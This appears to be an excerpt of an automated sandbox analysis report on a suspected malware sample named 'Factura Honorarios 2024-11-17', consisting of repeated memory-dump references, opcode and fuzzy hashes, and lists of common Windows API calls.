                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d0066c861d5e46f0f2855e8e67b5434d61df0805eb1cc75786d563f6c678240a
                                                                                                                                  • Instruction ID: a8c4de627fd390345f8137cb6640e7df13749dc12a3a6f63fd69273fb869593e
                                                                                                                                  • Opcode Fuzzy Hash: d0066c861d5e46f0f2855e8e67b5434d61df0805eb1cc75786d563f6c678240a
                                                                                                                                  • Instruction Fuzzy Hash: 9D221874E00218CFEB14DFA9C884B9DBBB2BF88304F5085A9D449AB395DB359D86CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688059348.0000000039170000.00000040.00000800.00020000.00000000.sdmp, Offset: 39170000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39170000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688111439.00000000391E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 391E0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_391e0000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 191decd6c1187740069191f8fe0a0aa4b10f3c8f9e744844df4be42f3e44f867
                                                                                                                                  • Instruction ID: fe03f23100bb986464291ae80ef719c38d896ef56b737f8276463a64e34c569c
                                                                                                                                  • Opcode Fuzzy Hash: 191decd6c1187740069191f8fe0a0aa4b10f3c8f9e744844df4be42f3e44f867
                                                                                                                                  • Instruction Fuzzy Hash: A6A182B5E01218CFEB64CF6AC944B9DFBF2BB89300F14C5AAD408A7254DB349A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 496b98d865464c4dbbaeba5f6a7aae255505b3ac6b7d9d9ca7f76223acd590c1
                                                                                                                                  • Instruction ID: d8e4d81b9d1451dde92d682cf0d7271cbdaef213d28c480723e408545f20c136
                                                                                                                                  • Opcode Fuzzy Hash: 496b98d865464c4dbbaeba5f6a7aae255505b3ac6b7d9d9ca7f76223acd590c1
                                                                                                                                  • Instruction Fuzzy Hash: 34A191B5E01229CFEB64DF6AC944BDDBBF2BB89300F14C1AAD408A7250DB345A85CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9ff7d81264db859eae6d1eb42a4e0663bfe916cdcdb8483ecaba5e5b3e3d9213
                                                                                                                                  • Instruction ID: 2a2ccd44511af60221729c75057d9898b311f2ee6efe7050f0d9d53e461ca182
                                                                                                                                  • Opcode Fuzzy Hash: 9ff7d81264db859eae6d1eb42a4e0663bfe916cdcdb8483ecaba5e5b3e3d9213
                                                                                                                                  • Instruction Fuzzy Hash: 37A1D4B4D00208CFEB14DFA9C944B9DBBB1FF89304F208269E409BB2A1DB759985CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: ae3e5d671e61bbe6c5a4746437f9fbfb3fd904c62daf1f7c2369a5c580eea47e
                                                                                                                                  • Instruction ID: 4cf730efb80f50398b3f6c4c0a8edd613a1aab9aad75f239e5ee51543531f7e2
                                                                                                                                  • Opcode Fuzzy Hash: ae3e5d671e61bbe6c5a4746437f9fbfb3fd904c62daf1f7c2369a5c580eea47e
                                                                                                                                  • Instruction Fuzzy Hash: 4A91E2B4D00208CFEB10DFA8C984B9DBBB1FF89314F208659E409BB2A1DB759985CF55
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 130bf2473f2024c70059e0f261ff6b7c9d89c41f9823e6cbeb0b57e838f36284
                                                                                                                                  • Instruction ID: 3333ed289defc4c09585f94c1baeabab3b1bae77ed0a49fb79320d02811d3006
                                                                                                                                  • Opcode Fuzzy Hash: 130bf2473f2024c70059e0f261ff6b7c9d89c41f9823e6cbeb0b57e838f36284
                                                                                                                                  • Instruction Fuzzy Hash: E581BE74E00218CFEB04DFA9C984A9DBBB2FF88300F608129D815BB355EB359946DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dc69d2eafd8897c9a9e9cffa32f250b01c3afca1421569dd4fb4352d4edfbb29
                                                                                                                                  • Instruction ID: 4b18919e57b30a590411f8c3856328182d1d57c97e635f16ba260562bbc603d0
                                                                                                                                  • Opcode Fuzzy Hash: dc69d2eafd8897c9a9e9cffa32f250b01c3afca1421569dd4fb4352d4edfbb29
                                                                                                                                  • Instruction Fuzzy Hash: EE819F78E00218CFEB14DFA9C994B9DBBB2BF88300F608169D815BB354EB359946DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688216836.0000000039210000.00000040.00000800.00020000.00000000.sdmp, Offset: 39210000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39210000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3876630b9521cfe2ae0872a17851dbf16568d7c3f2d29268c2c3524e2bef0ee8
                                                                                                                                  • Instruction ID: ddfa44fd60b2fc3aead5349b37df40917dc26ceec39f8df405d3164d832676f2
                                                                                                                                  • Opcode Fuzzy Hash: 3876630b9521cfe2ae0872a17851dbf16568d7c3f2d29268c2c3524e2bef0ee8
                                                                                                                                  • Instruction Fuzzy Hash: 7E81AE74E00218CFEB14DFA9C994B9DBBB2BF88300F648169D815BB354EB399946DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688179699.0000000039200000.00000040.00000800.00020000.00000000.sdmp, Offset: 39200000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39200000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 5de95b51e32a9e3e620a76d863532ab80e393512eee7b2632236f25854ea4c73
                                                                                                                                  • Instruction ID: fda0dbac069d12e98e2637b5546f0f6797b2c3bb45212b3654f98fb2840a753a
                                                                                                                                  • Opcode Fuzzy Hash: 5de95b51e32a9e3e620a76d863532ab80e393512eee7b2632236f25854ea4c73
                                                                                                                                  • Instruction Fuzzy Hash: 8A81A074E00618CFEB14DFA9C994B9DBBB2BF88300F608169D815BB394EB359946DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a5b55675f2546c5469f11f6096409bfd0797089c47b218c7972737165640c602
                                                                                                                                  • Instruction ID: 95c2a22e2bdb0cd3651d6bf3f18171f995222935641c12a7911fced130672931
                                                                                                                                  • Opcode Fuzzy Hash: a5b55675f2546c5469f11f6096409bfd0797089c47b218c7972737165640c602
                                                                                                                                  • Instruction Fuzzy Hash: 52819E74E00218CFEB14DFA9C894A9DBBB2FF89300F608129D815BB394EB359946DF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 99c7f5f071e578e272323445d7c8ad1864fe5069793c6a3efd2d8790ad1d81fd
                                                                                                                                  • Instruction ID: 5a41c0463db3ee826735a96ea8cdaa44444e02c4be877ec5ea7ae36bb82fe48f
                                                                                                                                  • Opcode Fuzzy Hash: 99c7f5f071e578e272323445d7c8ad1864fe5069793c6a3efd2d8790ad1d81fd
                                                                                                                                  • Instruction Fuzzy Hash: 3191F774E00618CFDB14CFA9C894A9DBBF2BF89301F158169E819AB365EB349D85CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9582c4328be7d487ec2876251b4f7a17f4c962d8675fa196b490001b3d99bd2f
                                                                                                                                  • Instruction ID: 766815c584cd500b5a0da4c5fb2f0426479e643112c687a0eddf7021dd8d0a35
                                                                                                                                  • Opcode Fuzzy Hash: 9582c4328be7d487ec2876251b4f7a17f4c962d8675fa196b490001b3d99bd2f
                                                                                                                                  • Instruction Fuzzy Hash: 7A81C674E00218CFEB14DFA9C884B9DBBF2BF89305F149169E819AB365DB305945CF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 634a3ea08c4efb9c992d5326347a08673f4cbf90f52701b49e5ed4182f1170b0
                                                                                                                                  • Instruction ID: d4ccc9b5e1ab4491246b46d242d7e24120625266a3a4ad8847f8852261fb677b
                                                                                                                                  • Opcode Fuzzy Hash: 634a3ea08c4efb9c992d5326347a08673f4cbf90f52701b49e5ed4182f1170b0
                                                                                                                                  • Instruction Fuzzy Hash: DC81B574E00218CFEB54DFAAD884A9DBBF2BF89301F14C169E819AB365DB309945CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: cf311db4ac5c9690afe840fefb81892d98807f81748e81297596618cfcff723d
                                                                                                                                  • Instruction ID: 0acfb1d40e4965139dfe75df59ed3f67f41e36ef7d6f68e86ea112f2b085a97c
                                                                                                                                  • Opcode Fuzzy Hash: cf311db4ac5c9690afe840fefb81892d98807f81748e81297596618cfcff723d
                                                                                                                                  • Instruction Fuzzy Hash: 6181C8B4E00258CFDB14DFAAD884A9DBBF2BF89301F148069E819AB365DB349945CF51
                                                                                                                                  Memory Dump Source

Control-flow Graph

APIs
• GetCurrentProcess.KERNEL32 ref: 39399776
• GetCurrentThread.KERNEL32 ref: 393997B3
• GetCurrentProcess.KERNEL32 ref: 393997F0
• GetCurrentThreadId.KERNEL32 ref: 39399849

Memory Dump Source
• Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false

Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd

Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0

                                                                                                                                  APIs
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 39399776
                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 393997B3
                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 393997F0
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 39399849
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2063062207-0

                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 394843A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0

                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 394843A2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0

                                                                                                                                  APIs
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 39486A91
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714655100-0

                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 393999C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0

                                                                                                                                  APIs
                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 393999C7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688442099.0000000039390000.00000040.00000800.00020000.00000000.sdmp, Offset: 39390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39390000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 39488F6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 39488F6D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688510443.0000000039480000.00000040.00000800.00020000.00000000.sdmp, Offset: 39480000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_39480000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 0-3916222277
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 0-2730988801
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 0b076ab19a965c144210f768512b02e55bb198e3ddef30c956798078d8d9bb89
                                                                                                                                  • Instruction ID: 39fec0b6a5140aa1661861b30f875a05e2d36dac752281074aa51a544148aaaa
                                                                                                                                  • Opcode Fuzzy Hash: 0b076ab19a965c144210f768512b02e55bb198e3ddef30c956798078d8d9bb89
                                                                                                                                  • Instruction Fuzzy Hash: 3D520D34A00218CFEB15DBA4C860B9EBB77EF88700F1080A9D51A7B7A5CF355E85AF51
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 05c30ffffa16cf437f5081b4d529b9fc1ef1c8134e174403292e69f3eb8028b1
                                                                                                                                  • Instruction ID: 019ca5273aed23b6765a3d056e3c24a1260b9ac2dca9f9ce7f496d7a0ea9ff55
                                                                                                                                  • Opcode Fuzzy Hash: 05c30ffffa16cf437f5081b4d529b9fc1ef1c8134e174403292e69f3eb8028b1
                                                                                                                                  • Instruction Fuzzy Hash: A3129835065646CFA2502B70EDAC12BBBF1FB1F32B7546CA8F10FC58659B7144C9CA62
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 42a6cc9bf485c3b183a0d8c05706f3ffb10a0a447f8b7264268b0626858d2706
                                                                                                                                  • Instruction ID: 51717c5b723abdccfef7a6ea750c83d6e7482e5fc3f4ee0331514f424c6c5d15
                                                                                                                                  • Opcode Fuzzy Hash: 42a6cc9bf485c3b183a0d8c05706f3ffb10a0a447f8b7264268b0626858d2706
                                                                                                                                  • Instruction Fuzzy Hash: B7521C74A00719CFDB54DF68DD94A8DBBB2FB89301F1042A9D609A7365DB306E86CF81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2657034742.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_150000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 86e93b24646254185766855ce24606b941dfd8207284c792421dc8e06064f4d9
                                                                                                                                  • Instruction ID: a30c75add678029ebfa438dc687ae25521314005c9c7ca5ab6f828b745634b6d
                                                                                                                                  • Opcode Fuzzy Hash: 86e93b24646254185766855ce24606b941dfd8207284c792421dc8e06064f4d9
                                                                                                                                  • Instruction Fuzzy Hash: 04126C30A04205CFCB15CF68E985AAEBBF1FF89315F158599E829DB2A1D730ED45CB50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2688009740.0000000038F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 38F80000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_38f80000_Factura Honorarios 2024-11-17.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 7ae80e8b477d045e6fbb61dcfbb1532d305f2867f54118e132eac43c69c7047a
                                                                                                                                  • Instruction ID: 8c171c1c6ed8ec035e8f1039575f4b984875b53fc61375f165f4923821b35e4d
                                                                                                                                  • Opcode Fuzzy Hash: 7ae80e8b477d045e6fbb61dcfbb1532d305f2867f54118e132eac43c69c7047a
